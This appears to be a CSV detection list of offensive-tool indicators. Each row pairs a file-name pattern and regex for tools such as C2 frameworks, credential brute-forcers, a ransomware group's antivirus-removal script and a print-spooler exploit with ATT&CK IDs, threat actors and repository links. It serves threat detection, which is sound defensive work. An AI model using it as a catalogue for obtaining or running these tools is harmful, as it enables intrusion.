"*/snmp-win32-users.nse*",".{0,1000}\/snmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11479"
"*/snmpwn.git*",".{0,1000}\/snmpwn\.git.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","11480"
"*/snmpwn.rb*",".{0,1000}\/snmpwn\.rb.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","11481"
"*/snsenum.py*",".{0,1000}\/snsenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","11482"
"*/SOAPHound.exe*",".{0,1000}\/SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","11483"
"*/SOAPHound.git*",".{0,1000}\/SOAPHound\.git.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","11484"
"*/SOAPHound/Program.cs*",".{0,1000}\/SOAPHound\/Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","11485"
"*/SocialBox.sh*",".{0,1000}\/SocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","11486"
"*/SocialBox-Termux*",".{0,1000}\/SocialBox\-Termux.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","10","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","11487"
"*/SocialPwned*",".{0,1000}\/SocialPwned.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","11488"
"*/SOCK5Server.cpp*",".{0,1000}\/SOCK5Server\.cpp.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","11489"
"*/socks5proxy.py*",".{0,1000}\/socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","11490"
"*/socks-auth-info.nse*",".{0,1000}\/socks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11491"
"*/socks-brute.nse*",".{0,1000}\/socks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11492"
"*/socks-open-proxy.nse*",".{0,1000}\/socks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11493"
"*/SolarFlare.exe*",".{0,1000}\/SolarFlare\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11501"
"*/SomalifuscatorV2.git*",".{0,1000}\/SomalifuscatorV2\.git.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","11503"
"*/Sophos Removal Tool.ps1*",".{0,1000}\/Sophos\sRemoval\sTool\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove Sophos","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","11504"
"*/Sophos%20Removal%20Tool.ps1*",".{0,1000}\/Sophos\%20Removal\%20Tool\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove Sophos","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","11505"
"*/SpaceRunner.git*",".{0,1000}\/SpaceRunner\.git.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","11508"
"*/SpamChannel.git*",".{0,1000}\/SpamChannel\.git.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","N/A","8","4","335","36","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z","11509"
"*/spawn.git*",".{0,1000}\/spawn\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","1","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","11510"
"*/specagents.py*",".{0,1000}\/specagents\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11511"
"*/specmodule.py*",".{0,1000}\/specmodule\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11512"
"*/specpayload.py*",".{0,1000}\/specpayload\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11513"
"*/spectaskbook.py*",".{0,1000}\/spectaskbook\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11514"
"*/specula.py*",".{0,1000}\/specula\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11515"
"*/specula_log.txt*",".{0,1000}\/specula_log\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11516"
"*/specula-main.zip*",".{0,1000}\/specula\-main\.zip.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11517"
"*/spellbound.git*",".{0,1000}\/spellbound\.git.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","11518"
"*/spellgen.py *",".{0,1000}\/spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","11519"
"*/spellstager.py *",".{0,1000}\/spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","11520"
"*/spider.yaml*",".{0,1000}\/spider\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","11521"
"*/spider_plus.py*",".{0,1000}\/spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11522"
"*/SpiderFoot-*.log.cs*",".{0,1000}\/SpiderFoot\-.{0,1000}\.log\.cs.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","11523"
"*/SpiderFoot.csv*",".{0,1000}\/SpiderFoot\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","11524"
"*/spiderfoot.git*",".{0,1000}\/spiderfoot\.git.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","11525"
"*/SpiderMate/Jatayu*",".{0,1000}\/SpiderMate\/Jatayu.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","11526"
"*/spinningteacup.py*",".{0,1000}\/spinningteacup\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11527"
"*/splunk_whisperer.git*",".{0,1000}\/splunk_whisperer\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","11529"
"*/SplunkWhisperer2.git*",".{0,1000}\/SplunkWhisperer2\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","11530"
"*/SPNSearcher.exe*",".{0,1000}\/SPNSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11531"
"*/spoof/dns*",".{0,1000}\/spoof\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11532"
"*/spoof/mdns*",".{0,1000}\/spoof\/mdns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11533"
"*/spoof/spoof_windows.*",".{0,1000}\/spoof\/spoof_windows\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11534"
"*/spoofer.py*",".{0,1000}\/spoofer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","11535"
"*/spoofing-office-macro.git*",".{0,1000}\/spoofing\-office\-macro\.git.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","11536"
"*/spoofIPs_client.py*",".{0,1000}\/spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","11537"
"*/SpookFlare.git*",".{0,1000}\/SpookFlare\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11538"
"*/spooler.py*",".{0,1000}\/spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11539"
"*/SpoolFool.exe*",".{0,1000}\/SpoolFool\.exe.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","11540"
"*/SpoolFool.git*",".{0,1000}\/SpoolFool\.git.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","11541"
"*/SpoolFool.ps1*",".{0,1000}\/SpoolFool\.ps1.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","11542"
"*/spoolsystem/SpoolTrigger/*",".{0,1000}\/spoolsystem\/SpoolTrigger\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - 